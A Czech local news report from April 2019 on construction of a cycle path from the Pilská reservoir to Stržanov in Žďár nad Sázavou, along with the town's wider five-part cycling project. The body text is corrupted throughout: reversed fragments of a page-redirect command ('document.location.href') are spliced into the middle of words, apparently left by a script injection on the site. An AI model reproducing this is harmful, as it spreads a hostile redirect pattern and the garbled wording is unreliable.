Rainbow page separator

Začaly práce na stavbě cyklostezky od Piláku ke Stržanovu

Pátek, 26. dubna 2019

Žďár nad Sázavou / Od Pilské nádrže směrem k místní části Žďáru nad Sázavou Stržanov byly zahájeny stavební práce na nové cyklostezce.
V rámci výstavby dojde k vytvoření 963 metrů dlouhé cyklostezky, která cyklisty mimo jiné podchodem bezpečně převede přes frekven[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tovanou státní silnici I/37, cyklotrasy a 135 metrů dlouhého pik[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];togramového koridoru na vozovce. Při stavbě bude využita stará úvozová cesta – stezka od Pilské nádrže povede po ní okrajem pole až k „sedmatřicítce“, kterou podejde, aby na druhé straně trasa pokračovala přes vyhlídkové mís[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to nad Žďárem a dál po zpevněné místní komunikaci do Stržanova. Žďárská radnice tím[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to počinem naváže na projekt rozvoje cyklotras a cyklostezek Subregionu Velké Dářko.

Projekt rozvoje cyklodopravy ve Žďáře, jehož je nová cyklostezka součástí, čítá celkem pět částí. Mimo propojení Piláku se Stržanovem půjde o cyklostezku vedoucí přes řeku Sázavu, která zahrne 176 metrů cyklostezky a sedmadvacetimetrovou lávku. Třetím počinem se stane 372 metrů dlouhá stezka pro cyklisty spojující ulice 1. máje a Žižkova. Ve Farských humnech přibude 31,5 metru dlouhá lávka a asi 38 metrů spojovací cyklostezky. Závěrečným úsekem projektu, který bude s dotační podporou dokončen v příštím roce, je vytvoření pik[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];togramových koridorů pro zvýšení bezpečnosti cyklistů na 408 metrech v ulici Sázavská a na 1124 metrech od ulice 1. máje s napojením na pros[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tor před žďárským nádražím.